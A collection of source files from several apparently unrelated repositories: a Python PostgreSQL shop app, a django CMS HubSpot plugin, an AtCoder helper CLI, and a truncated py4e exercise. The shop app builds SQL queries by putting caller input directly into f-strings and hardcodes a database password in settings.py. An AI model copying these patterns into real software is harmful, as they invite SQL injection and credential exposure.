"text": "import psycopg2\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT, \n database = 'shop_db')\n\ncursor = connection.cursor()\ncountry = \"\"\"CREATE TABLE country(\n id SERIAL PRIMARY KEY,\n country_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(country)\nconnection.commit()\n\ncity = \"\"\"CREATE TABLE city(\n id SERIAL PRIMARY KEY,\n city_name varchar(50) NOT NULL,\n counrty_id INT REFERENCES country(id)\n)\"\"\"\ncursor.execute(city)\nconnection.commit()\nemployee = \"\"\"CREATE TABLE employee(\n id SERIAL PRIMARY KEY,\n first_name varchar(50) NOT NULL,\n last_name varchar(50) NOT NULL,\n date_of_bitrth DATE NOT NULL,\n city_id INT REFERENCES city(id),\n chief_id INT REFERENCES employee(id)\n)\"\"\"\ncursor.execute(employee)\nconnection.commit()\ncategory = \"\"\"CREATE TABLE product_category(\n id SERIAL PRIMARY KEY,\n category_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(category)\nconnection.commit()\nproduct = \"\"\"CREATE TABLE product(\n id SERIAL PRIMARY KEY,\n product_name varchar(50) NOT NULL,\n unit_price real NOT NULL,\n counrty_id INT REFERENCES country(id),\n category_name INT REFERENCES product_category(id)\n)\"\"\"\ncursor.execute(product)\nconnection.commit()\ncustomer = \"\"\"CREATE TABLE customer(\n id SERIAL PRIMARY KEY,\n city_id INT REFERENCES city(id),\n first_name varchar(50) NOT NULL,\n last_name varchar(50) NOT NULL\n)\"\"\"\ncursor.execute(customer)\nconnection.commit()\norder = \"\"\"CREATE TABLE orders(\n id SERIAL PRIMARY KEY,\n employee_id INT REFERENCES employee(id),\n city_id INT REFERENCES city(id),\n date_of_order DATE NOT NULL,\n customer_id INT REFERENCES customer(id),\n product_id INT REFERENCES product(id),\n price REAL NOT NULL\n)\"\"\"\ncursor.execute(order)\nconnection.commit()\n\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 21.5,
"blob_id": "9205ea899e3f88dd3a1c13e6c32c762c19a609d6",
"content_id": "841d1fac1d0b040eb2340d12d40219560166805e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 4,
"path": "/settings.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "USER = 'postgres'\nPASSWORD = 'DBP@$$w0Rd' #your password\nHOST = '127.0.0.1'\nPORT = '5432'\n"
},
{
"alpha_fraction": 0.5432178974151611,
"alphanum_fraction": 0.5493687391281128,
"avg_line_length": 31.840425491333008,
"blob_id": "1ed289dbff3e735c03520ce7b72b98ed0cdfe3bb",
"content_id": "ba688ab2bbd6fca7ce7ea8eb22bc8b792a157070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3089,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 94,
"path": "/admin.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\nfrom connection import Connection\nimport datetime\n\nclass Admin(Connection):\n\n def __init__(self, login, password):\n self.login = login\n self.password = password\n\n def register_self(self):\n self.register( self.login, self.password, 'adm')\n \n def login_self(self):\n return self.login_check(self.login,self.password, 'adm')\n\n def get_order_info(self, category = '', selector = '', ):\n \"\"\"\n category must be one of the item from the list:\n ['city_name','date_of_order', 'product_name']\n\n date format for selector: 2020-6-12\n \"\"\"\n if self.login_self():\n categoryes = ['city_name','date_of_order', 'product_name', 'status']\n table = ('orders o',)\n fields = (\"\"\"o.id, concat(e.first_name,' ', e.last_name) as \"employee\", c.city_name, o.date_of_order, concat(c2.first_name,' ', c2.last_name) as \"customer\", p.product_name, o.price \"\"\",)\n if category and category in categoryes and selector != '':\n selector = selector if isinstance(selector, bool) == bool else str(selector)\n where = f\"\"\"where {category} = {selector}\"\"\"\n else:\n where = ''\n selector = f\"\"\" left JOIN employee e on e.id = o.employee_id \n left JOIN city c on c.id = o.city_id \n left JOIN customer c2 on c2.id = o.customer_id \n left JOIN product p on p.id = o.product_id {where}\"\"\"\n result = self.getData(table, fields, selector)\n fieldNames = [\"id\", \"employee\", \"city_name\",\"date_of_order\", \"customer\", \"product_name\", \"price\" ]\n changeRes = []\n for item in result:\n cort = {}\n for index,element in enumerate(item):\n cort[fieldNames[index]]=element\n changeRes.append(cort)\n else:\n changeRes = \"Invalid loging!\"\n return changeRes\n\n\n\n def add_pr_category(self, data):\n table = 'product_category'\n result = self._postData(table, data)\n return result\n\n def edit_pr_category(self, data, selector):\n table = 'product_category'\n result = self.updateData(table, data, selector)\n return result\n\n def delete_pr_category(self, selector):\n table = 'product_category'\n selector = f\"category_name = '{selector}'\"\n result = self.deleteData(table,selector)\n return result\n\n\n\n\n\nif __name__ == '__main__':\n\n admin1 = Admin('Admin1', '1234')\n # orders = admin1.get_order_info()\n # print(orders)\n data = [{\n 'category_name': \"Beer\"\n },\n ]\n put = admin1.add_pr_category(data)\n print(put)\n\n \n # data = {\n # 'category_name': \"Water\"\n # }\n # edit = admin1.edit_pr_category(data, \"category_name = 'Rom'\")\n # print(edit)\n # id = admin1.getNextId('product_category')\n # print(id)\n\n # dele = admin1.delete_pr_category('Beer')\n # print(dele)\n\n\n"
},
{
"alpha_fraction": 0.676706850528717,
"alphanum_fraction": 0.718875527381897,
"avg_line_length": 21.68181800842285,
"blob_id": "439134cf6f4856facca95f738a1dd14c4cc9a8da",
"content_id": "e96bd3102e0f0fc1607a62aceed4d0289a914aa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/app.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "from admin import Admin\nfrom customer import Customer\nfrom pprint import pprint\nimport datetime\nfrom custom import respprint\n\nadmin1 = Admin('Admin2', '1111')\n# admin1.register_self()\n\norders = admin1.get_order_info(category='status', selector=False)\n\nrespprint(orders)\n\n\n# print(admin1.login_self())\n\n\n# customer2 = Customer('kate', '1111')\n# # customer2.register_self('Kate', 'Kat', 2)\n# customer2.login_self()\n# # print(customer2.first_name)\n# customer2.create_order([('Apple',2,), ('Meat', 5)])"
},
{
"alpha_fraction": 0.6060606241226196,
"alphanum_fraction": 0.6130536198616028,
"avg_line_length": 24.294116973876953,
"blob_id": "e449dea53a3e2bbed176edeb752afd24db52bc32",
"content_id": "03bf3d0ae26dc411d4caf2a0e49487b7f3ea63a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 17,
"path": "/fill_table.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import psycopg2\nfrom settings import *\n\nconnection = psycopg2.connect(user = USER, password = PASSWORD,\n host = HOST, port = PORT, \n database = 'shop_db')\n\ncursor = connection.cursor()\ncursor.execute('SELECT * FROM employee WHERE city_id = 3;')\n\nresponse = cursor.fetchall()\n# print(response)\nfor item in response:\n print(item)\n\ncursor.close()\nconnection.close()"
},
{
"alpha_fraction": 0.45879119634628296,
"alphanum_fraction": 0.4780219793319702,
"avg_line_length": 25.071428298950195,
"blob_id": "a910b4d6d4fb9b54bf6c95e3039bc3c07b24b51b",
"content_id": "a181b9f500559bb8ce5709eff50637b331cea401",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 14,
"path": "/custom.py",
"repo_name": "yura-seredyuk/shop_app",
"src_encoding": "UTF-8",
"text": "import datetime\n\ndef respprint(obj):\n if type(obj) == str:\n print(obj)\n else:\n keys = list(obj[0].keys())\n for item in keys:\n print(\"{0:20s}\".format(item), end='')\n print()\n for item in obj:\n for element in item:\n print(\"{0:20s}\".format(str(item[element])), end='') \n print()"
}
] | 9 |
Blueshoe/djangocms-hubspot
|
https://github.com/Blueshoe/djangocms-hubspot
|
f0809ebcde6e61c2288b7c1039a9f65b9cdfc1bc
|
6f8a5e344624615dcb129be504c0db71345b0c30
|
fc6bec6035df3c4e0045f00d0cace3786e59e575
|
refs/heads/master
| 2022-05-02T17:09:23.568398 | 2022-03-03T10:16:47 | 2022-03-03T10:16:47 | 215,992,107 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8447204828262329,
"alphanum_fraction": 0.8447204828262329,
"avg_line_length": 25.83333396911621,
"blob_id": "5bd64c777d012fab9509a77557ddbb654c1f5d7b",
"content_id": "e8d5e0958164cbc8302fa339373ccbc6cb3de11a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/djangocms_hubspot/admin.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom djangocms_hubspot.models import HubspotForm, HubspotCTA\n\nadmin.site.register(HubspotForm)\nadmin.site.register(HubspotCTA)\n"
},
{
"alpha_fraction": 0.6075144410133362,
"alphanum_fraction": 0.6144508719444275,
"avg_line_length": 22.066667556762695,
"blob_id": "6bbca7e5f992be520cb808e06406a5d449c8964f",
"content_id": "8e1b7deee93c75c738d6288f1b14e9db4ba90ff9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1730,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 75,
"path": "/djangocms_hubspot/models.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom cms.models import CMSPlugin\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom six import python_2_unicode_compatible\n\n\n@python_2_unicode_compatible\nclass HubspotForm(models.Model):\n name = models.CharField(\n max_length=300,\n help_text=_('Name of the form. This is just to identify the form when you want to place it into a page.'),\n blank=False,\n null=False,\n )\n\n embed_code = models.TextField(\n blank=False,\n null=False,\n )\n\n class Meta:\n verbose_name = _('Hubspot form')\n verbose_name_plural = _('Hubspot forms')\n\n def __str__(self):\n return self.name\n\n\n@python_2_unicode_compatible\nclass HubspotCTA(models.Model):\n name = models.CharField(\n max_length=300,\n help_text=_('Name of the CTA. This is just to identify the CTA when you want to place it into a page.'),\n blank=False,\n null=False,\n )\n\n embed_code = models.TextField(\n blank=False,\n null=False,\n )\n\n class Meta:\n verbose_name = _('Hubspot CTA')\n verbose_name_plural = _('Hubspot CTAs')\n\n def __str__(self):\n return self.name\n\n\n@python_2_unicode_compatible\nclass HubspotFormPluginModel(CMSPlugin):\n form = models.ForeignKey(\n 'HubspotForm',\n blank=False,\n null=False,\n on_delete=models.CASCADE\n )\n\n def __str__(self):\n return self.form.name\n\n\n@python_2_unicode_compatible\nclass HubspotCTAPluginModel(CMSPlugin):\n cta = models.ForeignKey(\n 'HubspotCTA',\n blank=False,\n null=False,\n on_delete=models.CASCADE\n )\n\n def __str__(self):\n return self.cta.name\n"
},
{
"alpha_fraction": 0.7483516335487366,
"alphanum_fraction": 0.7494505643844604,
"avg_line_length": 30.379310607910156,
"blob_id": "54ce1aaa383447670aa3f4397ebb2c49c1815ac4",
"content_id": "7868562a05f0de6677a10deac89fd9f3b078235a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 29,
"path": "/djangocms_hubspot/cms_plugins.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom djangocms_hubspot.forms import HubspotFormPluginForm, HubspotCTAPluginForm\nfrom djangocms_hubspot.models import HubspotFormPluginModel, HubspotCTAPluginModel\nfrom django.utils.translation import gettext_lazy as _\n\n\n@plugin_pool.register_plugin\nclass HubspotFormPlugin(CMSPluginBase):\n model = HubspotFormPluginModel\n form = HubspotFormPluginForm\n name = _('Hubspot Form')\n module = _('Hubspot')\n render_template = 'djangocms_hubspot/plugins/form.html'\n cache = True\n text_enabled = True\n\n\n@plugin_pool.register_plugin\nclass HubspotCTAPlugin(CMSPluginBase):\n model = HubspotCTAPluginModel\n form = HubspotCTAPluginForm\n name = _('Hubspot CTA')\n module = _('Hubspot')\n render_template = 'djangocms_hubspot/plugins/cta.html'\n cache = True\n text_enabled = True\n"
},
{
"alpha_fraction": 0.5571061372756958,
"alphanum_fraction": 0.5717958211898804,
"avg_line_length": 41.546875,
"blob_id": "25c35da94021c4b9227623ce559ee3f6db95846b",
"content_id": "5da1661bb14649c092923329a2b320f83cc67791",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2723,
"license_type": "permissive",
"max_line_length": 250,
"num_lines": 64,
"path": "/djangocms_hubspot/migrations/0001_initial.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.15 on 2019-10-18 08:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('cms', '0016_auto_20160608_1535'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='HubspotCTA',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Name of the CTA. This is just to identify the CTA when you want to place it into a page.', max_length=300)),\n ('embed_code', models.TextField()),\n ],\n options={\n 'verbose_name': 'Hubspot CTA',\n 'verbose_name_plural': 'Hubspot CTAs',\n },\n ),\n migrations.CreateModel(\n name='HubspotCTAPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_hubspot_hubspotctapluginmodel', serialize=False, to='cms.CMSPlugin')),\n ('cta', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='djangocms_hubspot.HubspotCTA')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n migrations.CreateModel(\n name='HubspotForm',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(help_text='Name of the form. This is just to identify the form when you want to place it into a page.', max_length=300)),\n ('embed_code', models.TextField()),\n ],\n options={\n 'verbose_name': 'Hubspot form',\n 'verbose_name_plural': 'Hubspot forms',\n },\n ),\n migrations.CreateModel(\n name='HubspotFormPluginModel',\n fields=[\n ('cmsplugin_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='djangocms_hubspot_hubspotformpluginmodel', serialize=False, to='cms.CMSPlugin')),\n ('form', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='djangocms_hubspot.HubspotForm')),\n ],\n options={\n 'abstract': False,\n },\n bases=('cms.cmsplugin',),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6829268336296082,
"alphanum_fraction": 0.7195122241973877,
"avg_line_length": 40,
"blob_id": "af6ecbb99c2c90d6236923f93e36d88247dd42da",
"content_id": "cae6ac92ca42e425c7eb29129a4a4cfdefc4e4c9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 82,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 2,
"path": "/djangocms_hubspot/__init__.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "__version__ = '0.2.0'\ndefault_app_config = 'djangocms_hubspot.apps.HubspotConfig'\n"
},
{
"alpha_fraction": 0.6595744490623474,
"alphanum_fraction": 0.6595744490623474,
"avg_line_length": 10.75,
"blob_id": "3acf52e40aff18baf7d362f79bc2e79fbca61383",
"content_id": "10e15326b9436e0aa838d7e864fbea8f8e51d6fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 47,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 4,
"path": "/scripts/build.sh",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nrm -rf dist/*\npython setup.py sdist\n"
},
{
"alpha_fraction": 0.6527777910232544,
"alphanum_fraction": 0.65625,
"avg_line_length": 15,
"blob_id": "353ce6f0764da5bd682662b0f1d06da932582a29",
"content_id": "364d2500256499a219af2603243c89c6041fa6de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 576,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 36,
"path": "/README.md",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "# django CMS Hubspot\n\n\nA plugin for django CMS which makes integrating HubSpot easier.\n\nIt creates plugins for:\n\n- Forms\n- CTAs\n\nForms and CTAs are manually added to the CMS and can then be selected whenever inserting a form/CTA into a page.\n\n\n## Installation\n\n\n- install with `pip`:\n\n `$ pip install djangocms-hubspot`\n\n\n- add the django app to `INSTALLED_APPS` in your settings file:\n```\n INSTALLED_APPS = (\n ...\n 'django_select2',\n 'djangocms_hubspot',\n ...\n )\n```\n\n- run `python manage.py migrate`.\n\n\n### Dependencies\n- django-select2\n"
},
{
"alpha_fraction": 0.6507936716079712,
"alphanum_fraction": 0.6578482985496521,
"avg_line_length": 23.65217399597168,
"blob_id": "1d8af512509ed1e87c339fdbed89058b73ba7866",
"content_id": "12b6c77073a6a7ebaf32ee76f42199019c1e7a6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 567,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 23,
"path": "/djangocms_hubspot/forms.py",
"repo_name": "Blueshoe/djangocms-hubspot",
"src_encoding": "UTF-8",
"text": "from django import forms\n\nfrom django_select2.forms import Select2Widget\n\nfrom djangocms_hubspot.models import HubspotFormPluginModel, HubspotCTAPluginModel, HubspotForm, HubspotCTA\n\n\nclass HubspotFormPluginForm(forms.ModelForm):\n class Meta:\n model = HubspotFormPluginModel\n fields = '__all__'\n widgets = {\n 'form': Select2Widget\n }\n\n\nclass HubspotCTAPluginForm(forms.ModelForm):\n class Meta:\n model = HubspotCTAPluginModel\n fields = '__all__'\n widgets = {\n 'cta': Select2Widget\n }\n"
}
] | 8 |
kenji-miyake/atcoder-helper
|
https://github.com/kenji-miyake/atcoder-helper
|
7f23c9dce38ff2eaeddbc02c58d219eca5b1760b
|
6acf29281b9eeb0646cbf14e77950b4988610689
|
14d0ebb1d8e0a1bb46318730bf5b2a6ddd009c7b
|
refs/heads/master
| 2023-02-23T20:00:58.042598 | 2021-01-31T06:58:16 | 2021-01-31T06:58:16 | 198,219,177 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5771230459213257,
"alphanum_fraction": 0.6533795595169067,
"avg_line_length": 20.370370864868164,
"blob_id": "b54c1976c2a33b4d21f1ae0bdd272d433e0d880d",
"content_id": "0c96a089a284c88d59c60055855ab0559ff0b66c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 577,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 27,
"path": "/pyproject.toml",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "[tool.poetry]\nname = \"atcoder-helper\"\nversion = \"0.3.0\"\ndescription = \"Simple CLI helper tool for AtCoder\"\nauthors = [\"Kenji Miyake <[email protected]>\"]\nlicense = \"MIT\"\n\n[tool.poetry.dependencies]\npython = \"^3.9\"\nargcomplete = \"^1.12.2\"\nrequests = \"^2.25.1\"\nbeautifulsoup4 = \"^4.9.3\"\n\n[tool.poetry.dev-dependencies]\nipython = \"^7.19.0\"\nflake8 = \"^3.8.4\"\npep8-naming = \"^0.11.1\"\nmypy = \"^0.790\"\nblack = \"^20.8b1\"\nisort = \"^5.7.0\"\n\n[tool.poetry.scripts]\natcoder-helper = \"atcoder_helper.__main__:main\"\n\n[build-system]\nrequires = [\"poetry-core>=1.0.0\"]\nbuild-backend = \"poetry.core.masonry.api\"\n"
},
{
"alpha_fraction": 0.6398744583129883,
"alphanum_fraction": 0.643012285232544,
"avg_line_length": 27.972028732299805,
"blob_id": "47e0b1ca3b72d2b56b51ca942c9e40c72b3b6b69",
"content_id": "1aad8f1d2ec407c2e63391db5aecc5e8194b788d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4143,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 143,
"path": "/atcoder_helper/command/gen.py",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nimport re\nimport shutil\nimport sys\nfrom dataclasses import asdict, dataclass\nfrom logging import getLogger\nfrom pathlib import Path\n\nimport requests\nfrom argcomplete.completers import DirectoriesCompleter, FilesCompleter\nfrom bs4 import BeautifulSoup\n\nlogger = getLogger(__name__)\nlogger.setLevel(\"DEBUG\")\n\natcoder_base_url = \"https://atcoder.jp\"\n\n\n@dataclass(frozen=True)\nclass Task:\n contest_id: str\n task_id: str\n task_url: str\n alphabet: str\n\n\ndef get_page(url):\n try:\n response = requests.get(url)\n except ConnectionError as e:\n logger.error(e)\n sys.exit(1)\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n if response.status_code != requests.codes.ok:\n logger.error(f\"statuc_code was {response.status_code}, please confirm url: {url}\")\n sys.exit(1)\n\n return BeautifulSoup(response.text, \"html.parser\")\n\n\ndef get_tasks(contest_id: str, alphabets: list[str] = None) -> list[Task]:\n page = get_page(f\"{atcoder_base_url}/contests/{contest_id}/tasks\")\n\n tbody = page.find(\"tbody\")\n if not tbody:\n logger.error(\"no tbody found\")\n sys.exit(1)\n\n tasks = []\n for tr in tbody.find_all(\"tr\"):\n tds = tr.find_all(\"td\")\n alphabet = tds[0].text\n task_path = tds[1].find(\"a\").attrs[\"href\"]\n\n task_url = f\"{atcoder_base_url}{task_path}\"\n task_id = Path(task_url).name\n\n if not re.match(r\"[A-Z]\", alphabet):\n continue\n\n if alphabets:\n if alphabet not in alphabets:\n continue\n\n tasks.append(Task(contest_id, task_id, task_url, alphabet))\n\n if not tasks:\n logger.error(\"no task found\")\n sys.exit(1)\n\n return tasks\n\n\ndef generate_task_dir(task: Task, task_dir: Path) -> None:\n logger.debug(f\"make directory: {task_dir}\")\n task_dir.mkdir(parents=True, exist_ok=True)\n\n with open(task_dir / \"task.json\", \"w\") as f:\n json.dump(asdict(task), f)\n\n\ndef copy_template_file(task_dir: Path, template_file: Path) -> None:\n target = task_dir / (\"main\" + template_file.suffix)\n\n if not target.exists():\n shutil.copy(template_file, target)\n else:\n logger.info(f\"template file already exists and was not copied: {target}\")\n\n\ndef get_recent_contest_ids(prefix: str, parsed_args, **kwargs):\n get_params_dict = {}\n if prefix.startswith(\"abc\"):\n get_params_dict[\"ratedType\"] = 1\n if prefix.startswith(\"arc\"):\n get_params_dict[\"ratedType\"] = 2\n if prefix.startswith(\"agc\"):\n get_params_dict[\"ratedType\"] = 3\n\n get_params = \"&\".join([f\"{k}={v}\" for k, v in get_params_dict.items()])\n\n page = get_page(f\"{atcoder_base_url}/contests/archive?{get_params}\")\n tbody = page.find(\"tbody\")\n\n contest_ids = []\n for tr in tbody.find_all(\"tr\"):\n tds = tr.find_all(\"td\")\n contest_id = tds[1].find(\"a\").attrs[\"href\"].replace(\"/contests/\", \"\")\n contest_ids.append(contest_id)\n\n return contest_ids\n\n\ndef get_alphabets_in_contest(prefix: str, parsed_args, **kwargs):\n tasks = get_tasks(parsed_args.contest_id)\n all_alphabets = [task.alphabet for task in tasks]\n return [alphabet for alphabet in all_alphabets if alphabet not in parsed_args.alphabets]\n\n\ndef add_arguments(subparser):\n subparser.add_argument(\"contest_id\", type=str).completer = get_recent_contest_ids\n subparser.add_argument(\"alphabets\", type=str, nargs=\"*\", default=[]).completer = get_alphabets_in_contest\n subparser.add_argument(\"--contests-dir\", type=Path, default=Path(\"./contests\")).completer = DirectoriesCompleter()\n subparser.add_argument(\"--template-file\", 
type=Path).completer = FilesCompleter()\n\n\ndef main(args):\n tasks = get_tasks(args.contest_id, args.alphabets)\n if not tasks:\n logger.error(f\"do nothing because no task was found\")\n sys.exit(1)\n\n for task in tasks:\n task_dir = args.contests_dir / task.contest_id / task.alphabet\n\n generate_task_dir(task, task_dir)\n\n if args.template_file and args.template_file.exists():\n copy_template_file(task_dir, args.template_file)\n"
},
{
"alpha_fraction": 0.7021968960762024,
"alphanum_fraction": 0.7021968960762024,
"avg_line_length": 25.148935317993164,
"blob_id": "935f46dae78912cf57727898fa715a3d21096479",
"content_id": "32f1436ea326f4e786654e2a0b0af116550181a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1229,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 47,
"path": "/atcoder_helper/__main__.py",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nfrom logging import StreamHandler, basicConfig, getLogger\n\nimport argcomplete\nimport pkg_resources\n\nimport atcoder_helper.command.gen\n\nlogger = getLogger(__name__)\nlogger.setLevel(\"DEBUG\")\n\nversion = pkg_resources.get_distribution(\"atcoder-helper\").version\n\n\ndef get_sub_commands():\n return [v for v in vars(atcoder_helper.command) if not v.startswith(\"_\")]\n\n\ndef get_sub_command_module(sub_command):\n return getattr(atcoder_helper.command, sub_command)\n\n\ndef main() -> None:\n handler = StreamHandler()\n handler.setLevel(\"INFO\")\n basicConfig(handlers=[handler])\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {version}\")\n\n subparsers = parser.add_subparsers(dest=\"command\")\n for sub_command in get_sub_commands():\n sub_command_module = get_sub_command_module(sub_command)\n sub_command_module.add_arguments(subparsers.add_parser(sub_command))\n\n argcomplete.autocomplete(parser, exclude=[\"-h\", \"--help\", \"--version\"])\n\n args = parser.parse_args()\n\n sub_command_module = get_sub_command_module(args.command)\n sub_command_module.main(args)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7350993156433105,
"alphanum_fraction": 0.7430463433265686,
"avg_line_length": 19.97222137451172,
"blob_id": "690ebe39379646d2c754df25bd070618bcd9a2cc",
"content_id": "41643f0fcf24c347de824c3a45051c5dd43e1ef0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 755,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 36,
"path": "/README.md",
"repo_name": "kenji-miyake/atcoder-helper",
"src_encoding": "UTF-8",
"text": "# atcoder-helper\n\n## Overview\n\nSimple CLI helper tool for AtCoder\n\n## Installation\n\n- `pip install git+https://github.com/kenji-miyake/atcoder-helper`\n\n## Usage\n\n```sh\natcoder-helper gen [--contests-dir CONTESTS_DIR] [--template-file TEMPLATE_FILE] contest_id [alphabets [alphabets ...]]\n```\n\nTo use command-line completion, please follow the instructions in [argcomplete](https://github.com/kislyuk/argcomplete).\n\nIf you're using fish-shell, please run the following command.\n\n```sh\nregister-python-argcomplete --shell fish atcoder-helper | source\n```\n\n## Example\n\n```sh\n# Create your template file\nvim template.cpp\n\n# Create contest workspace\natcoder-helper gen --template-file template.cpp abc001 A B\n\n# Start coding\nvim contests/abc001/A/main.cpp\n```\n"
}
] | 4 |
andreus42/py4e
|
https://github.com/andreus42/py4e
|
c1c61becb571f7a7e6ee719872630decabc2a7de
|
f49e891b41d8e594d8109545c31e3f961a0b6038
|
f425b94a814986bba211576690ea3ee4a7f367c9
|
refs/heads/master
| 2020-03-19T07:19:31.979555 | 2018-07-10T11:00:29 | 2018-07-10T11:00:29 | 136,105,153 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6563436388969421,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 29.24242401123047,
"blob_id": "3f0bbb01e33cea537b748bbc55ddfc2e6cfc9467",
"content_id": "b9b90e8542d0880f7ee6d2393a53b2d4e5a07e0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 259,
"num_lines": 33,
"path": "/_site/10.2.py",
"repo_name": "andreus42/py4e",
"src_encoding": "UTF-8",
"text": "'''\n10.2 Write a program to read through the mbox-short.txt and figure out the distribution by hour of the day for each of the messages. You can pull the hour out from the 'From ' line by finding the time and then splitting the string a second time using a colon.\nFrom [email protected] Sat Jan 5 09:14:16 2008\nOnce you have accumulated the counts for each hour, print out the counts, sorted by hour as shown below.\n'''\n\n# name = input(\"Enter file:\")\n# if len(name) < 1 : name = \"mbox-short.txt\"\n\nname = \"mbox-short.txt\"\nhandle = open(name)\n\ncounts = dict()\n\n# Read line, Find \"From\", Strip\nfor line in handle:\n if not line.startswith(\"From \") : continue\n current = (line.rstrip()).split()\n time_list = (current[5]).split(\":\")\n hour = time_list[0]\n \n # Make dictionary for counting\n counts[hour] = counts.get(hour, 0) + 1\n hour_list = list()\n \n #Make in to tuple list for sorting\n for k, v in 